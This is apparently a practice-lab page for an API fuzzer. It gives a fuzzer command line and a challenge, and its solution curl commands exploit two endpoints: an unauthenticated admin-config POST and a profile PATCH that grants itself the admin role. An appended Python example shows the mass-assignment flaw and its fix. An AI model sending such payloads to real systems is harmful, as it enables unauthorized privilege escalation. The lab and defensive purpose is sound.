API Griffer sample target

A small sample site with fuzzable API endpoints.

Use this target at https://api-fuzz.labs.nsouthern.com, then point API Griffer at it to confirm route discovery, method handling, and clear responses.

Example run against the target:
python3 api_fuzzer.py -u https://api-fuzz.labs.nsouthern.com/api -b wordlists/endpoints.txt -a wordlists/actions.txt --depth 1 -X GET -o findings.jsonl

Sample endpoints

These paths are intentionally aligned with the bundled endpoint and action wordlists.

Challenge

There are two vulnerable endpoints: one uses a POST request and one uses a PATCH request. Find them and exploit them.

Solution curl commands
curl -X POST https://api-fuzz.labs.nsouthern.com/api/admin/config -H "Content-Type: application/json" -d '{"adminEmail":"admin@example.com"}'

curl -X PATCH https://api-fuzz.labs.nsouthern.com/api/users/profile -H "Content-Type: application/json" -d '{"displayName":"Nico","role":"admin"}'
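A defender's counterpart to the two solution commands above, added here as an example and not code from API Griffer or the lab site: it models both endpoints as plain functions so the hardening can be unit-tested offline. It assumes (the page does not say so; the payloads suggest it) that the profile PATCH copies every JSON key onto the user record and that the admin config POST performs no authorization check.

```python
# Added example, not code from API Griffer or the lab site. It models the two
# challenge endpoints as plain functions so the fix can be unit-tested offline.
# Assumption (suggested by the solution payloads, not stated on the page): the
# profile PATCH copies every JSON key onto the user record, and the admin
# config POST does no authorization check.
from dataclasses import dataclass, field

# Keys a user may change on their own profile. "role" is deliberately absent.
PROFILE_WRITABLE = frozenset({"displayName"})


@dataclass
class User:
    name: str
    role: str = "user"
    profile: dict = field(default_factory=dict)


def patch_profile_naive(user: User, body: dict) -> User:
    """Mass-assignment pattern (the assumed lab defect): every key in the
    body is written to the record, so {"role": "admin"} promotes the caller."""
    for key, value in body.items():
        setattr(user, key, value)
    return user


def patch_profile(user: User, body: dict) -> User:
    """Hardened: only allow-listed keys are applied; anything else is a 400.
    Rejecting, rather than silently dropping, makes probing visible in logs."""
    rejected = set(body) - PROFILE_WRITABLE
    if rejected:
        raise ValueError(f"fields not writable: {sorted(rejected)}")
    user.profile.update(body)
    return user


def update_admin_config(requester: User, config: dict, body: dict) -> dict:
    """Hardened admin endpoint: authorize on the server-side role, never on
    anything in the request body; then accept only the expected key."""
    if requester.role != "admin":
        raise PermissionError("admin role required")  # -> 403
    if set(body) != {"adminEmail"}:
        raise ValueError("only adminEmail may be set")  # -> 400
    config["adminEmail"] = body["adminEmail"]
    return dict(config)
```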